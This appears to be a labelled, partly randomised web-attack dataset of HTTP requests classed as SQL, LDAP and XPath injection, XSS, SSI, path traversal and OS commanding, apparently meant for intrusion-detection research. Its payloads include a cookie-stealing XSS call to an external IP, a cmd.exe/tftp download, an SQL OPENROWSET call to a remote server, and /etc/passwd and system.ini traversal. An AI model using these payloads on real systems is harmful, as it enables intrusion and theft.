Transfer-Encoding: compress
Upgrade: 3ri/5.3, 3tr/9.3, daeuf/7.9, h2tiee/5.4, i6epn/2.5
Warning: 574 www.atGujel.jpg "loeha" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40633
Start - Id: 45431
class: PathTransversal
POST /do4@LsCN/ds3NfJKzw/7Dwherehtaccesx/ahini/wKU/h6H3celzyq/hlxo/6rt4U3lfYcita5temkn/_kX-facX9bnetcat/zK.shtml? HTTP/1.1
Content-Length: 255
Content-Language: a3idei,qlea3
Content-Encoding: deflate
Content-Location: http://onei.com/iwmtj.mdb
Content-MD5: NW9ldXN0bzRzZ25hYXBwMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Thu, 19 Oct 06 21:17:24 GMT
Host: 64.51.208.147
Connection: close
Accept: text/*;q=0.2, audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 102.25.110.183
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="00"
Date: Tue, 24 Jun 08 24:58:30 UTC
ETag: W/"nr8@VlaLMddU-beuo"
Expect: nHenleg
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 16 Feb 06 10:25:30 UTC
If-Unmodified-Since: Wed, 25 Jan 06 10:27:52 UTC
If-Match: "pqBflgYPsq09-3HXqT"
If-None-Match: "b_EsV_ytGyaG@wdzjv"
If-Range: "GSCfKCXE0ARYEh7AN"
Max-Forwards: 4978
MIME-Version: 4.4
Pragma: ut='tHwo'
Proxy-Authorization: Digest username="aierso"
Authorization: CoaBs wI9kr4h=endwLvw
Range: -292636,082693-
Referer: http://gxpotpa.it/iEro0o6a/nnuryt/8fieoetc/mnnr.bin
TE: gzip,deflate
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (compatible; ratte4o; Win98; rsqdk)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/8.9 245.103.187.32, 4.5 www.Bhea.tiff
Transfer-Encoding: compress
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 027 www.80Tmnqe.tiff "nrptaalt484raSb7" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6o0o=cFI&in5aAcgst6uywC=tChV&1lu=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&odt=352&iutbRouo=6I9.ZpJV3&ftpacceptoOoptlIFA0=ar3x&r1keamo=67359&utdacapi=9750094&c5on1Bb8ari5gia=1rre:tnwCrfoh&Mg1pC=ooel$t/urZeedey&ch=ralaxyalihcd

End - Id: 45431
Start - Id: 38997
class: LdapInjection
GET /ep6raetPaeNosto/rbrx1nF/0AiufuBhurqutpe/A87echolAOcat/cWc7nal/etxlmmyrsaazs4d9an8.jpeg?npTnkIor8laTa=99&OESy=3847&le5=%3F+&vHSHJkSTH=833459&eRrotaL=oah2seb&m0g@fPJn5f4=l51cJmr7R2Xn&asnnmols=is4%24nje%3Fnat%28srg&opl6ap=9214465&4vvy4inzktdiDc=%29%28+++%7C%28ae%3DrtseN*%29&nreS7=7tp&6lyNmai=Aeincludeiye HTTP/1.1
Host: www.a2ostlhyh.org
Connection: 9pn0
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 216.18.46.179
Cookie: tWo=node
Cookie2: $Version="17"
Date: Fri, 05 May 06 22:30:29 UTC
ETag: W/"D4kBkEp7RtEZDZU7qq"
Expect: 100-continue
If-Modified-Since: Thu, 22 Jul 04 20:26:18 CET
If-Unmodified-Since: Sun, 30 Sep 07 09:41:27 GMT
If-Match: *
If-None-Match: *
If-Range: "bEQM14it5HWDdXlWuy9F"
Max-Forwards: 1
MIME-Version: 9.7
Pragma: no-cache
Authorization: Digest uri=http://www.eojhr.gov/tubu/Fsoe/2aoiAw.tar
Range: -4
Referer: /Feayecfd/EeHx/htwph.mpg
Trailer: Referer
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 5.0; ru-ds; rv:9.2.6) Gecko/23145281
UA-CPU: StrongARM
UA-Disp: 542,569,16
UA-OS: Windows 98
UA-Pixels: 3912x6700
Via: FTP/5.6 66.166.55.166:61, 2.2 213.62.46.200, HTTP/8.3 105.34.29.66
Transfer-Encoding: identity
X-Serial-Number: 2731422703648766
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38997
Start - Id: 49407
class: XPathInjection
GET /sey7teptem/rcesifeinntEfe/d9sOGZCQ53zEupdateB/alvRCKNl/l5h_3f07gCsg8FKpUxt/uFO/undhsweae/PhititC.html?geooo=nrtabH&tIeobii=078934640&te5eftie=aegnt%2Fcn%2Futkai%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D2%5D+++++%7C++++7riA%2FLiv5e%2Fs0%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D13%5D+or+++%27e0Id%27+++%3D+++%27&lttsjfemltotoe=749&aleptw=CempyrseoiashutdownI3&ivt=A0l%5C HTTP/1.1
Host: 5.157.134.191
Connection: close
Accept: application/*;q=0.3, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: 5-qpP1Eto, tOyt-bss;q=0.8, 3rTr8cse-QiO;q=0.2, ao90Ae-bbDmOcu;q=0.4
Cache-Control: no-cache
Client-ip: 86.141.178.217
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="6"
Date: Tue, 29 May 07 11:06:44 GMT
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Sun, 18 Jan 09 01:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:04:47 GMT
Max-Forwards: 353
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://www.6elo.de/hiauomet/rothewao/nesrde/cs5ded/st1ri.wav
TE: trailers,gzip
Trailer: If-Range
User-Agent: tiasomee/7.1.7
UA-CPU: StrongARM
UA-Disp: 7200,5804,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: deflate
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49407
Start - Id: 38640
class: LdapInjection
GET /khh06o4F/oXVJ6hR/eyhtTsirqnOeotEncNe/aSl-kM5/hmlawEoee3ae.gif?iagsyotm4weose=uob2naer6h&ceei=eatsfupdate1ca7enho&pE=1357842&oz8nhhliv1emdk=%29+%28+%7C+%28displayName%3Dhad*%29++++%28name%3Dhad*+++%29%28+++mail%3Dhad*%29&5sdo=elscct&e6r=5ucenlrmhhs2k&etaafg=%2FoKupdatensmen%5D&7Ersye0s547a=76839822 HTTP/1.1
Host: www.vhzb.biz
Connection: close
Accept: text/xml, audio/basic;q=0.9, audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress;q=0.1, compress;q=0.5, gzip
Accept-Language: miedanee-lctn;q=0.4, bp-hi
Cache-Control: max-age=6
Client-ip: 48.249.181.128
Cookie: cbnxirg87is=<lr<m6%oee;iaan=b
Cookie2: $Version="732"
Date: Sat, 17 Mar 07 12:16:33 CET
ETag: W/"3BSBwrGl0.hUle1"
Expect: sedr=mo9hfett
From: ntz5@eaoe2Pre.cz
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Sun, 20 Feb 05 04:28:22 UTC
If-Match: *
If-None-Match: "hmLJNMycd8a9o4opk9Gc"
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 3
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: http://www.rEoe.com/4eaeneg/8ta4ery/g5nhade/ftojaisb.mdb
TE: trailers,trailers,deflate;q=0.7
Trailer: If-Modified-Since
User-Agent: eseas8pdaqrrsns
UA-CPU: Sparc
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38640
Start - Id: 42196
class: SqlInjection
GET /sqf16IA3/aie/cVarZ/b.5U.sqNs0t/idlgSgTxQRfWjx278BRX/htOaU/txTb/-5uPtCuBL..html?aotXgsnl=nqT2&6ai=%2Fa8vcaraxtiNm&ucn7hyxcaon2glw=zrm&acrga4=z+ic1mwp-childigattmpessystemGenn&aEhegnrOin=sboot.ini6e%3Eknsts%3Bhro8xaz&9BXinonfeo=oeRXh_z2mJJA&nycolsksa3att=seuaOysokF&iDJKuoaDconnectH=%3Ctnte&bntln=jiknlee%5CihMperl&viLcosae=qHar%3Feop1+%5B&enythr5Weeje2n=%3B+insert+into++++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3De8n%3Bpwd%3Dtae%3BNetwork%3DDBMSSOCN%3BAddress%3D114.164.213.164%2C1433%3B%27%2C%27select++++*++from+++_sysdatabases%27%29%3B+++select+++++*++from+++++LinkedOrRemoteSrv1.master.dbo.sysdatabases HTTP/1.1
Host: www.nntiso.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=33
Client-ip: 139.139.72.242
Cookie: aeahhes88o3k=uw8XlA4@;xfiivhscs=7i ci;tu=htpass]htaccesnwihw3&&Otmns$c4e;looisa4hitp=anD
Cookie2: $Version="961"
Date: Sat, 23 Apr 05 09:16:50 CET
ETag: W/"mDVvfRc_ydIMiZa"
Expect: 100-continue
From: g0Ln@OyJoc.biz
If-Modified-Since: Fri, 21 Oct 05 02:29:51 GMT
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: eL=thlteio
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nc=D9Efa2bf
Range: -3,97623-
Referer: http://wjswBpei.org/e1slvmu/Cs5m/32i1nw/re2laheh.gz
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 2.6; pl-tc; rv:9.0.4) Gecko/17371558
UA-CPU: StrongARM
UA-Disp: 109,198,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: 1.4 213.47.0.114, HTTP/5.8 www.hseT.gif
Transfer-Encoding: gzip
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 746787770668949
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42196
Start - Id: 45639
class: PathTransversal
GET /tr39.htm?thh52htrutc=3&input40_1XoJtccV=dohJ&0@Eu@z2w5x1=%5CWINNT%5Csystem.ini&ehpXod=exTsrlebs&attdseOFcbyit=76826&RetIYhWC=X&ode=19450&eAod5s=e9eeritcnVRege%25u12dye&otd=itaslibrciselectE1%5C6&nCF7VcatwHRzpi=scohnssCqhimtZ&edrAuedSythl=a%3Bye&MQZjPGtLvariBR=80796&Ha=336605758&Ieoectsbn=eeH&th=n HTTP/1.0
Host: 186.132.59.174
Connection: xcln9a
Accept: video/quicktime, image/*;q=0.5, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 179.115.20.75
Cookie: dQ97dsn2ct=n9RF4NasUHHb;vals=8 ;rh80EU7od=oe58D7VqODfi;ossdn=eeu;tT1s=kiS
Cookie2: $Version="56"
Date: Tue, 23 Sep 08 02:43:38 CET
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: soov59N@5mxue.fr
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Wed, 02 Nov 05 13:59:52 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: "yeVFiT5pXsOY.0tcI"
If-Range: Fri, 26 Dec 08 15:47:27 GMT
Max-Forwards: 143
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: NTLM c1MzdGFhb0xyZWFhdHlucjl0d2Vzd1d0MXdxb2h1dU9wbG5lQW5pSXJpYw==
Range: -5753
Referer: /i2re/xlzso/3rendei.php
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 5.1; e9-Ob; rv:5.1.4) Gecko/17137459
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: FTP/1.6 www.ermeVrw.jpeg, entho/7.7 www.EnBs.jpg
Transfer-Encoding: compress
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45639
Start - Id: 47930
class: XSS
GET /sVFblkHmB3V1cAzPxq.asmx?erloO7frA=maile&oto2aiae=NasaRs7tesegroup+byqIcTu&eiehsgDhnncfsq=iCgjek15M&loeeT=76&oaTeuege=273373&6eolju=%3Cimg+src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F110.10.90.219%2Fnttive.exe%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E&me4e6tbtohlt7=897357&mhgeoeBmodo=eam&t6meumte=rwnn%27&9ie=016&Umho=eQ6 HTTP/1.1
Host: www.cOecis5eic.gov:80
Connection: ttsdrb4T
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 194.3.251.41
Cookie: Hp5=c ;yitwdyl=4sgen;esc=46987
Cookie2: $Version="613"
Date: Thu, 16 Dec 04 17:49:23 GMT
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Sat, 26 May 07 06:43:28 CET
If-Unmodified-Since: Tue, 27 Dec 05 09:22:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 37
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: http://www.m8oaafcc.it/erecnt/rxnnhtya/eeerro/bR3ra.pl
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/7.9 (X11; U; Unix 2.4; fy-ha; rv:9.1.2) Gecko/28438834
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: identity
Upgrade: rmhmkL/0.0, a6ssth/8.0, pto/4.4, edcoWe/0.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47930
Start - Id: 35953
class: PathTransversal
PUT /XdivI1LrxvGpeKfxC/aodbe13nRenstc/teyD96ffp/sTRRLC/ldecYerhed/ntQHC-LSm8_6.jpg? HTTP/1.0
Content-Length: 131
Content-Language: dcudti,egicwmgw
Content-Encoding: compress
Content-MD5: YWVFMGNzdTZhaHRhdHJkcw==
Content-Type: application/x-www-form-urlencoded
Host: 91.128.202.138:9121
Connection: siEad
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.0, identity, identity;q=0.2, gzip
Cookie: j5eta=1qgeeF5iaadhl;suylauannsyns=Eai;JxGvr81gT8Ki=o;ykfsoiaxsnmlR=<!--     #include virtual="/etc/passwd"-->;n9SsT= J sr
Date: Thu, 28 Sep 06 10:13:32 GMT
If-Range: Sun, 19 Dec 04 19:40:01 CET
Max-Forwards: 45
MIME-Version: 3.1
Pragma: no-cache
Authorization: vEanl caTe=5pc0eo
Referer: /easnbe/lsclriu.mpg
User-Agent: sYD9WR http://www.cmn1.cz
Transfer-Encoding: deflate

ot=nxTt3@V&70etenaem3=ovi eaccess_logcetd2tB-Ino&0sqgyltybern=@mt&i9ecco0vrgmtStS=215627&efoneort=eei$o&iliIsacitrbe8EN=32670

End - Id: 35953
Start - Id: 44417
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: 100.61.19.164
Connection: rtCeln
Accept: */*
Accept-Charset: iso-8859-3;q=0.3, iso-8859-2;q=0.8, iso-8859-15;q=0.5, x-mac-turkish
Accept-Encoding: 
Accept-Language: azhclc1d-hNpoa, e-ou;q=0.8, neigmRE-2haTee;q=0.2, ltcoMt-da, het-asdg;q=0.8
Cache-Control: min-fresh=1814
Client-ip: 211.226.85.152
Cookie: asj9rot=40;b6yzQ=790589;whm=5z;egtc=nsmm
Cookie2: $Version="45"
Date: Wed, 15 Jun 05 09:46:13 CET
ETag: W/"9DlqrmBByHGPWvxbgG"
Expect: qeSl8a=erci;preie
From: efawm@cnueo.st
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Tue, 02 Jan 07 01:10:37 GMT
If-Match: *
If-None-Match: "Ox7366H@R4rKw0BBBa7"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 074
MIME-Version: 6.2
Pragma: esGSwi=iteHEWe
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://urEdeuki.biz/1eeesd/eoseOTi/earstq.zip
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: xpne/5.9.1.6.2
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: compress
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44417
Start - Id: 41223
class: SqlInjection
GET /l7Drfv91uxEhIW-it2/oA-7UlS6xY84YTsE/sduEl19Pz.4X/ydqfgguD8ET/iacqrle3/wgtedpezo/t8Q_f2z1ybncqFQ/9o4.w66k13connectO/eUO/Soajmmeu8xo/pbje2apT_xPPM8epVl/hEBs.cgi?ml.7Ww=e8NfTreRM6&eibH5wRchildikwboot.ini=7753&sit=at&olEAce=lssileiennl&iiM=po%3E&FAuM=a%3Attoacvbscriptob%7Cqexeci&FWnieBm.A=eZPAArg&ermeh=yyml HTTP/1.1
Host: 59.128.59.63
Connection: keep-alive
Accept: audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oaarx-bEeiig
Cache-Control: no-transform
Client-ip: 73.137.44.90
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="8"
Date: Wed, 27 Jun 07 17:19:58 GMT
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 100-continue
From: lcrspkh@Odiotms.cz
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Nov 04 05:46:15 GMT
Max-Forwards: 1
Pragma: osst=i
Authorization: copm 9iafmRf=ntEnlhl
Referer: /ttnae/tDco/Urttt/t3hc/ulLk.png
TE: trailers,chunked,trailers
User-Agent: OR 'ovs' =     N'     '
UA-CPU: 68000
UA-Color: color32
Via: HTTP/8.0 70.155.117.52
Transfer-Encoding: deflate
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 54822756786329442
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41223
Start - Id: 49400
class: XPathInjection
GET /lerietedtTbl/ho14E/tYLp/exua/ze1KWcnP/lzdL/rleu63eooeb6nioe/uomi.png?2lsf4eT8ci=t%3Fe%3Cmnno&ilt=atpyfi%27%5D+++%7C++P+++++%7C+++++%2F%2Fuser%5B+name%2Ftext%28+++%29+%3D++++%27qS2in HTTP/1.0
Host: www.ts9stZ.gov:82817
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, identity;q=0.7
Accept-Language: *;q=0.7
Cache-Control: eb='l9i'
Client-ip: 172.166.16.169
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Tue, 01 Sep 09 11:41:36 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 20 Mar 04 24:13:04 CET
If-Unmodified-Since: Mon, 12 Nov 07 01:53:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 5
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: eva0ie ht0wn=itiroFtg
Range: -0106,51-,47531-
Referer: /lueeg/nybos/ee5aodzL/ertun.js
TE: trailers
Trailer: If-Range
User-Agent: ltNelnbn6 (am6bfe; c5AeQg; rN2BGtZ0Ds)
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 604x3659
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: gzip
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 260 86.25.83.250:0820 "hreojjeu" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49400
Start - Id: 39324
class: SSI
GET /ndd/Ywk6FB/argyay1t/IoTOlqVsd/em.mdb?i0hlwecod4ltn=56449885&2ezobqct2up2t=tl&htnio=t1f2Oa5&mntert=ukwed&iiitEeem2rN=bexec&sV_like3xywM.3=1481612&PsS4kbYnatas=Qnrfzacnhttp&ls=Q%24teyah%3Bhd7%2Fc&UtilsierIaL=%26i+o+&toyEsnatmo=rn6jeoethLsdtin&t9tEtoNe=sZ.Lv.lQR1%40&geeFOoeocr=730&eu7f8ese9p5d9h=%3C%21--%23email+fromhost%3D%22www.i4pher.com%22+tohost%3D%22mailbox.dHg.com%22+message%3D%22tdqx+ierLir+orrsae+e2exeA%22+fromaddress%3D%22Lsrnxc.com%22+toaddress%3D%22wipe.1E1hM.com%22+subject%3D%22k%22+sender%3D%22fe.com%22+replyto%3D%22fhete3.com%22+cc%3D%223htU%22+inreplyto%3D%223a7la+tte+rasYa%22+id%3D%22Cosaemail%22+--%3E HTTP/1.0
Host: 253.49.21.107:12536
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: deflate
Accept-Language: C1-nd;q=0.4, trrny-deoe
Cache-Control: max-age=697
Client-ip: 46.191.36.107
Cookie: ekOk=hFzOhZRzvp;RotiNeeq=wZa6W8Pud27d;ocO1reTpbt2y=le<ddl<4ao
Cookie2: $Version="764"
Date: Wed, 27 May 09 19:43:14 CET
ETag: "NkGZJgLmq2ooIWKkf"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Fri, 29 Jan 10 11:43:19 CET
If-Unmodified-Since: Sat, 14 Feb 09 09:54:45 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jul 04 07:57:42 CET
Max-Forwards: 4871
MIME-Version: 1.4
Pragma: xa=eti7n8
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest nonce
Range: -7892
Referer: /4he0m0el/jt4hcCr8/woayr0.avi
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 1.1; ef-th; rv:2.2.6) Gecko/08637166
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39324
Start - Id: 48931
class: XPathInjection
GET /NI/id/sN2n7j1bq8cceFD3/eBbp5sa/aoneRa8aoyevvr/xetQn1m/4Eqq6WSb/etvffesshsoijh/schdesa/tF/zes80tEldppRr3/iOqnogoe.htm?PRlujpOlAg=npsut7%27+++or+++++af%2Fxpt%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D9%5D+or++++%27p039a%27+%3D%27&tosL=%27%2Fhyashutdown+rand&gaftlN7nlouYos=tEZ8Gf0HbnUq&gItblot=ra%7C&s4liiadv=tsou&inodeIF1mEupdate=708740 HTTP/1.1
Host: 241.222.154.139
Connection: teSlo6r
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr, x-mac-cyrillic, x-mac-chinesesimp;q=0.5, x-mac-chinesesimp, x-mac-japanese;q=0.9
Accept-Encoding: *
Accept-Language: cp-tholehia;q=0.5, qid-ueel;q=0.2, eclshf-iOhl;q=0.5, e9pt-re;q=0.5, me-r4ueet
Cache-Control: no-transform
Client-ip: 174.124.242.131
Cookie: oeeteownassIk=3101573;hrFruP=\libE;or7ereh=07818;tEXevalyr=lr Fbetween;dHC6=8670801387;lih2=eLO
Cookie2: $Version="7"
Date: Mon, 17 May 04 18:28:40 UTC
ETag: "10JPxibSyM8@OLZ6-kC"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Tue, 29 Jun 04 18:00:09 CET
If-Unmodified-Since: Fri, 27 Aug 04 17:59:05 CET
If-Match: "nZI3FkIZ2jzM3JnR"
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: plii6yd='f'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Digest opaque="wasllza"
Range: 326-470558,-0121
Referer: /hetfo.php
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: taEheaj/0.4.5
UA-CPU: StrongARM
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: gemKe/2.6 97.164.108.201, 6.9 www.tcattc.js
Transfer-Encoding: dedro
Upgrade: tHifu/1.7
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48931
Start - Id: 47830
class: XSS
